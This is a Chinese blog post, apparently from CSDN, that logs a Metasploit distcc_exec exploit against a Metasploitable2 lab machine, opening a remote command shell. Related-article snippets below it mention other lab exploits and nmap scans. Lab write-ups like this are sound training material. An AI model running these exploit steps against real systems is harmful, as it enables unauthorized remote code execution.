Metasploitable2 - tcp port 3632 - distccd

最新推荐文章于 2022-09-29 17:05:15 发布
最新推荐文章于 2022-09-29 17:05:15 发布
阅读量929 收藏
点赞数
分类专栏: Pentesting Metasploit Metasploitable2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/38326775
版权 


msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(distcc_exec) > run

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo swakf4bpbO2EMNLX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "swakf4bpbO2EMNLX\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.113:4444 -> 192.168.1.111:46641) at 2014-07-31 23:44:49 -0400

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
 
Abort session 1? [y/N]  ^Cy

[*] 192.168.1.111 - Command shell session 1 closed.  Reason: User exit


Nixawk
关注
专栏目录
分布式编译distcc
hzgdiyer的专栏
12-20 1349
工程代码编译速度太慢,决定采用分布式编译来提高编译速度.distcc ,请参考。
Metasploitable2 - tcp port 8180 - tomcat
Nixawk
08-01 1900
msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy):    Name      Current Setting  Required  De
Metasploitable2靶机之第七篇--Distcc后门漏洞
千寻的博客
04-02 1979
文章目录环境原理漏洞利用第一步 ,启动metasploit第二步选择漏洞库第三步 设置参数,开始攻击第四步 利用成功,执行验证摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 Distcc用于大量代码在网络服务器上的分布式编译, 但是如果配置不严格,容易被滥用执行命令, 该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制 漏洞利用 第一步
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 7253
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Samba&distcc 漏洞
weixin_34204722的博客
04-06 387
漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。 使用metasploitmetasploitable 靶服务器进行*** metasploitable 是ubuntu8.0的版本 neuss扫描到漏洞 139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasp...
boot-example-netty-tcp-2.0.5
04-28
使用SpringBoot2.x集成Netty4.x创建基于TCP/IP协议的服务端和客户端的Demo代码案例 使用了SpringBoot+swaggerUI方式进行测试,客户端可以给服务端发送消息,服务端也可以给已经连上的客户端发送消息,使用了通道保活...
Metasploit2 - tcp port 21 - vsftpd
Nixawk
07-29 1358
Metasploitable2: tcp port 21 - vsftpd Metasploitable2的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)”[笑脸],那么在6200端口会监听一个后门. msf> use exploit/unix/ftp/vsftpd_234_ba
STM32+W5500 Modbus-TCP协议功能实现
04-04
经过这几天的学习与调试,终于在STM32F103VCT6+W5500(SPI1)+Freemodbus 平台上,实现Modbus-TCP协议的功能。其实很简单,只要熟悉Modbus-RTU通讯,明白Modbus帧的结构等,Modbus-TCP只是在原来的帧结构上加个头,去...
TCP和MODBUS-TCP通讯调试软件V1.2_Wince_Winxp_通用版
01-06
还可做TCP调试器, 此软件免费使用。 功能如下: 1.多网卡支持,点击“网卡X”处可自动切换网卡IP。 2.增加MODBUS寄存器个数至9999。 3.修改一次最多读写寄存器个数120个。 4.增加WIN7等高版本系统支持。 5....
Modbus-TCP协议说明
Smacq的博客
09-29 8782
本文主要介绍了Modbus-TCP协议的内容,简单提及一些硬件的连接。
Metasploit溢出漏洞
hhiollk的博客
07-07 755
废话不多说直接上图帖命令
distcc 链接失败_Samba&distcc 漏洞
weixin_33068055的博客
01-17 183
漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。使用metasploitmetasploitable 靶服务器进行***metasploitable 是ubuntu8.0的版本neuss扫描到漏洞139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3...
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
Metasploitable2使用指南
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 6370
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
distcc 帮助页 2
hnhbdss的专栏
10-11 2412
distcc manual page Table of Contents NAMESYNOPSISDESCRIPTIONQUICKSTARTQUICKSTART FOR DISTCC-PUMP MODEHOW PLAIN (NON-PUMP) DISTCC WOR
kali linux攻击机及windowsXp/Metasploit_linux靶机安装及在此基础上的蜜罐系统搭建(上)
微光·火炬
06-20 7217
一、创建虚拟机Linux攻击机步骤: 1.下载安装好Vmware 2.创建新虚拟机——Linux攻击机       (1)点击 “ 创建新虚拟机”,出现如下视图,选择“稍后安装操作系统”,下一步 (2)选择Linux操作系统,版本选为“其他Linux3x内核64位”,下一步——>位置自选,下一步       (3)选择磁盘容量,尽量大一点
distcc加速内核编译
weixin_30439067的博客
04-04 325
Linux内核编译实在是费时间的事,搞内核移植的时候总要编译,生命有一部分就浪费在等内核编译完成上,有心想买个HP的工作站,看了下Z840的价格,想想还是算了。distcc早就听说过,一直没有去试试,今天终于试了试,真是大赞啊!!下面说下如何配置,为了方便叙述,先定义几个称呼 我直接工作的电脑称为L 用来加速编译的电脑们称为A、B、C(它们也被称为compile farm) 安装 ...
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3628
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
最新发布
05-26
Nmap是一款强大的网络发现和安全审计工具,可以用来扫描目标主机的端口和服务,以确定其漏洞和安全风险。 以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤: 1. 确定目标主机的IP地址。可以使用ping命令或其他工具来确定目标主机的IP地址。 2. 打开终端,输入以下命令扫描Metasploitable2-XP主机的开放端口: ``` nmap -p- 192.168.1.101 ``` 该命令将扫描目标主机的所有端口,并显示开放的端口和对应的服务。 3. 打开终端,输入以下命令扫描Metasploitable2-Linux主机的开放端口: ``` nmap -sS -p 1-65535 192.168.1.102 ``` 该命令将使用TCP SYN扫描模式扫描目标主机的所有端口,并显示开放的端口和对应的服务。 注意:在扫描Linux主机时,需要使用sudo权限来执行该命令。 4. 分析扫描结果,确定可能存在的漏洞和安全风险,并采取相应的措施加强主机的安全防护。 总之,使用Nmap工具可以帮助我们快速发现目标主机的端口和服务,从而评估主机的安全风险,并采取措施加强主机的安全防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值